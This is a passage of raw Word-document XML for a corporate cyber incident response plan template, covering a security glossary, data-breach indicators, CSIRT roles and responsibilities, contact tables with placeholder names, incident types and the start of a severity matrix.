          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">nes.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Service availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">describes the state of a system being available and responsive to prospective users. The term is sometimes used to reference a measure of reliability of a system or network resource based on how often it is available as a % of time. For example, 99.97% ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">vice availability means that a system is available 99.97% of the time.</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SLA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">stands for service level agreement and is used to describe a guaranteed measure of service availability. If service availability drops below the prescribed SLA, there are usually financial repercussions, like a money-back guarantee.</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Stakeholder relationship map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is a diagram that describes the relationship between individuals in an organization. With respect to cyber security, these diagrams are used to perform IT risk assessments to better inform preventative and reactive measures.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Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is a piece of code or bug within a system that causes unintended or unanticipated behavior. A vulnerability implies that this behaviour can be taken advantage of for malicious reasons.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War room </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is a dedicated meeting room where major incidents are handled together. It must have a door for privacy, must be available at all times, and must have good communications infrastructure (network, phone, etc.)</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0"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is a type of vulnerability that is known to the software vendor but doesn’t have a patch in place to fix the flaw. It has at least the potential to be exploited, if it has not already been exploited by cybercriminals.</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160" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="3320" w:left="334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single" w:color="000000" w:sz="10"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How To Recognize A Data Breach Cyber Incident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How to Recognize a DATA BREACH Cyber Incident</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 cyber security incident may not be recognized straightaway; however, there may be indicators of a security breach, system compromise, unauthorized activity, or signs of misuse within your environment, or that of your third-party service providers.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Look out for any indication that a security incident has occurred or may be in progress. Some of these are outlined below .</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Unusual Data Access Patterns: Access to sensitive customer information at odd hours.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Unauthorized Privilege Escalation: Sudden changes in user permissions without approval.</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Abnormal Network Traffic: Unexplained large outbound data transfers.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Missing or Altered Log Files: Suspicious tampering with log records.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Login Attempts from Foreign Locations: Repeated login attempts from untrusted geographies.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Presence of Malware: Detection of malicious software on critical systems.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Unauthorized API Calls: Suspicious interactions with customer databases.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Customer Complaints: Reports of fraudulent transactions by customers.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Phishing Campaigns: Staff receiving targeted phishing emails before a breach.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Compromised Credentials: Reports of leaked login details on the dark web.</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i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators such as unauthorized access, unusual data transfers, and compromised credentials are critical signs of a data breach (SANS Institute, 2021)</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Cyber Security Incident Response Team</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:sz="10"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(CSIRT)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Cyber Security Incident Response Team (CSIRT)</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CSIRT Structure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360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4562475" cy="2390775"/>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2934" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId79"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4562474" cy="23907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59.25pt;height:188.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId79" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber Security Incident Response Team (CSIRT).</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CSIRT Roles</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CSIRT Roles</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933"/>
        <w:gridCol w:w="6073"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="5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CSIRT Role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Role Definition</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="129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Executive</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Accountable Executive for protecting cyber security within the organization. Responsible for reporting to board directors and other executives. Within the CSIRT, this role is responsible for all issues requiring executive decision.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="105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Incident Handler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The Incident Handler is the main triage role of the CSIRT. This role organizes the team and initiates the Incident Response Plan to investigate and respond to cyber security incidents.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="129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Communications</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The Communications Expert is responsible for both public relations and internal communications. They are the messenger to ensure that internal/external stakeholders, customers, and the public are informed in a timely and compliant fashion.</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Legal Expert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jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Provides advice on compliance, regulatory notifications, and legal liabilities.</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Forensics Lead</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jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Analyzes compromised systems, collects evidence, and identifies vulnerabilities.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="57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Network Technician</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jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensures containment and eradication of threats from the network.</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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Notes- Taker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jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensures all correspondence and minutes of meetings are taken and documented</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="6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3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07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jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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CSIRT Responsibilities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responsibilities described below are organized by role within Amazon.com Inc..</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0" w:line="397" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Executives The Executives are responsible for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Making critical decisions regarding incident response and resource allocation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Approving communication strategies and public statements</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Liaising with board members and key stakeholders</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Authorizing engagement with law enforcement and regulatory bodies</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Overseeing the overall incident response process</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Ensuring compliance with legal and regulatory requirements</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Incident Handler The Incident Handler is responsible for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Coordinating and managing the incident response process</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Assessing the severity and impact of the incident</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Developing and implementing containment strategies</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Overseeing the recovery and restoration efforts</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Documenting all actions taken during the incident</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Conducting post-incident analysis and reporting</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Communications Expert The communications expert is responsible for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Developing and executing internal and external communication plans</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Crafting clear and timely messages for different stakeholders</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Managing media relations and public statements</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Coordinating with legal and management teams on messaging</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Ensuring consistent communication across all channels</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Monitoring public reaction and adjusting communication strategies as needed</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CSIRT Team Cyber Security Incident Response Team (CSIRT) members are responsible for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Performing technical analysis of the incident</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Implementing containment measures to prevent further spread</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Collecting and preserving digital evidence for investigation</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Assisting with system recovery and restoration</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Identifying vulnerabilities that led to the incident</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Network Team: Isolate infected systems from the network. "Disable affected network ports and VLANs."</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Forensics Team: Preserve evidence for analysis : Use dd to create disk images for affected systems</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Recommending security improvements to prevent future incidents</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All staff members are responsible for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Immediately reporting any suspicious activities or potential security incidents</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Following security protocols and best practices in their daily work</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Participating in regular security awareness training</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Cooperating fully with the incident response team during investigations</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Maintaining confidentiality about the incident as directed by management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720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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sz w:val="36"/>
        </w:rPr>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0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Contact Information</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CSIRT Contacts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719"/>
        <w:gridCol w:w="999"/>
        <w:gridCol w:w="1257"/>
        <w:gridCol w:w="1066"/>
        <w:gridCol w:w="892"/>
        <w:gridCol w:w="779"/>
        <w:gridCol w:w="2643"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="5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CSIRT Role</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>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5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Name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066"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Title</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>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671"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Phone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200" w:before="100" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="420"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Email</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1035"/>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Executive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Jane Doe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:tab/>
              <w:tab/>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Chief Information Officer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+1 555-0101</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jane.doe@amazon.com</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1515"/>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Incident Handler** (lead)</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John Smith</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Security Operations Lead</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>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+1 555-0202</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john.smith@amazon.com</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1275"/>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Incident Handler (backup)</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Rhy tylls</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Security Operation</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+1 555-0307</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Ryh.tylls@amazon.com</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Communications</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Sarah Connor</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PR Lead</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+1 555-0303</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>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sarah.connor@amazon.com</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Network</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Robert Taylor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>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Network Lead</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+1 555-0505</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robert.taylor@amazon.com</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Desktop</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Jessica Jones</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IT Analyst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+1 555-0308</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J.jones@amazon.com</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1035"/>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Server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Tim Lee</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Network Admin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+1 555-0506</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tim.lee@amazon.com</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Legal Expert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Michael Lee</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Head of Legal</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+1 555-0404</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michael.lee@amazon.com</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="8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Note-taker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Wee Li</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Secretary</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+1 555-0309</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200" w:before="100" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="420"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">W.li@amazon.com</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71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9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gridSpan w:val="3"/>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2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77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6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External Contacts </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15"/>
        <w:gridCol w:w="1485"/>
        <w:gridCol w:w="1209"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="954"/>
        <w:gridCol w:w="3077"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2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Role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Organization</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Name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Title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Phone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420"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Email</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="5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Legal Consultant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External Law Firm</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Ann Taylor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Consultant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+1 555-0515</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taylor.a@lawfirm.com</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="78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Payment Provider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Payment Gateway, Inc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>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Maria Gonzalez</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Consultant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+1 555-0534</w:t>
            </w:r>
            <w:r/>
          </w:p>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maria.g@paymentgateway.com</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="5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Cloud Provider</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AWS</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Support Team</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Consultant</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+1 555-0768</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i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">aws-support@amazon.com</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8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09"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315"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5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7"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42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Other Stakeholder Contacts</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943"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="1243"/>
        <w:gridCol w:w="1438"/>
        <w:gridCol w:w="858"/>
        <w:gridCol w:w="1468"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2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Role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Organization</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Name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Title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Phone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280"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Email</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9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jc w:val="center"/>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14"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24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3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85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4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28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single" w:color="000000" w:sz="10"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Incident Types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Incident Types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203"/>
        <w:gridCol w:w="6223"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2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Type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Description</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="5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Unauthorized Disclosure or Loss of Information</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An incident affecting the confidentiality, integrity, or availability of data.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="27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Privacy Breach</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An incident that involves real or suspected loss of personal information.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="51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Information Security/Data Breach</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An incident that involves real or suspected loss of sensitive information.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="75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Account Data Compromise</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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">A data breach incident specific to payment card data. Such events result in unauthorized access to or exposure of payment card data (cardholder data or sensitive authentication data).</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20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622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br/>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Incident Severity Matrix</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CSIRT will determine the severity of the incident. They will consider:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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whether a single system is affected or multiple</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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the criticality of the system(s) affected</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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whether impacting a single person or multiple</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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whether impacting a single team/department, multiple teams/departments, or the entire organization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Incident Handler must consider the relevant business context and what else is happening with the business at the time to fully understand the impacts and urgency of remedial action.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CSIRT will consider the available information to determine the known magnitude of impact compared with the estimated size, along with likelihood of the effect spreading and the potential pace of such spread. The CSIRT will determine the potential impac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
